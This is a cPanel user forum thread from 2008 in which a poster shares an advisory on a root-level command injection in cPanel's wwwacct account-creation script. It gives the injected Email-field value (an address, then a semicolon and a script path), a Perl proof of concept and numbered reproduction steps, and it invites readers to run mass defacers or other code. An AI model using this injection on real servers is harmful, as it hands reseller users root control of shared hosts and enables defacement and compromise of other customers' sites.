The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

bug report : root access with a reseller account.

Discussion in 'General Discussion' started by php-empire, Nov 8, 2008.

  1. php-empire

    php-empire Registered

    Joined:
    Jun 27, 2007
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    PHP:
    ('binary' encoding is not supportedstored as-isBy Ali Jasbi IHST security hacking Research teamWwW.Hackerz.ir
    Vendor 
    Cpanel.net
    Version 
    ALL !!
    Risk Very high
    What u can 
    do with this bug is :
    u can have a access to all the server with reseller privilege (Th3 r00t)
    how it's work ?
    when u want to create an account in shell what will happen ?
    ./script/wwwact [domainname] [username] [password] [Email address] lab lab lab
    that u can run it with a web base program ! ( cpanel : doamin:2086)
    example :
    http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
    it means you got a access to wwwacct in the scripts folder (Th3 r00t)
    so u can run other command with root access like that
    ./scripts/wwwactt domain.com domain password ali_at_hackerz.ir;./home/hackerz/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)
    that u can Likewise run it on the web base program.what u need to do is just write ali_at_hackerz.ir;./home/hackerz/public_html/do.pl in Email text box when u want to create an account.
    ()()()()()()()()()()()()()
    Test it:
    ++++++++++++++++++++++++++
    Step 1

    Save this file in /home/user/public_html/do.pl .
    #!/usr/bin/perl
    $old='
    /home/user/public_html/test.txt';
    $new='
    /home/root/kon.txt';
    rename $old, $new;
    ++++++++++++++++++++++++++
    step 2

    make a text file named test.txt in your public_html directory.
    path will be : /home/user/public_html/test.txt .
    ++++++++++++++++++++++++++
    step 3

    create an account and write ali_at_hackerz.ir;./home/user/public_html/do.pl in E-mail Address text box
    then click on the "create" button.
    Yes , you can find your file in /home/root/ .
    ++++++++++++++++++++++++++
    ()()()()()()()()()()()()()
    you can run your own code !(mass defacer, exploit'
    or everything that u want).
    Enjoy it... 

    hello cpanel security team
    you patch this bug in new version ?
    very cretical:(
     
  2. weetabix

    weetabix Well-Known Member

    Joined:
    Oct 26, 2006
    Messages:
    56
    Likes Received:
    1
    Trophy Points:
    8
  3. php-empire

    php-empire Registered

    Joined:
    Jun 27, 2007
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    very thank u
    have a good time :)
     
Loading...

Share This Page